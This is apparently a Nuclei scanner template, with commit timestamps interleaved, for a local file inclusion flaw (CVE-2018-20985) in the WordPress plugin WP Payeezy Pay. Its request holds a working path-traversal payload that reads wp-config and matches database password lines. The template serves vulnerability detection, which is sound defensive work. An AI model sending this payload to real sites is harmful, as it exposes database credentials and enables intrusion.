2021-07-22 08:35:12 +00:00
id : CVE-2018-20985
info :
name : WordPress Plugin WP Payeezy Pay 2.97 - Local File Inclusion
author : daffainfo
2022-04-22 10:38:41 +00:00
severity : critical
description : WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive
information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected.
2021-08-18 11:37:49 +00:00
reference :
2021-07-22 08:37:50 +00:00
- https://www.pluginvulnerabilities.com/2018/12/06/our-improved-proactive-monitoring-has-now-caught-a-local-file-inclusion-lfi-vulnerability-as-well/
- https://www.cvedetails.com/cve/CVE-2018-20985/
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2018-20985
cwe-id : CWE-20
2022-04-22 10:38:41 +00:00
tags : cve,cve2018,wordpress,lfi,plugin
2021-07-22 08:35:12 +00:00
requests :
- method : POST
path :
- "{{BaseURL}}/wp-content/plugins/wp-payeezy-pay/donate.php"
2021-07-22 13:31:00 +00:00
body : "x_login=../../../wp-config"
2021-07-22 08:35:12 +00:00
matchers-condition : and
matchers :
2021-07-22 12:32:43 +00:00
- type : word
words :
2021-07-22 13:31:00 +00:00
- "The base configuration for WordPress"
- "define( 'DB_NAME',"
- "define( 'DB_PASSWORD',"
condition : and
2021-07-22 12:32:43 +00:00
part : body
2021-07-22 08:35:12 +00:00
- type : status
status :
- 200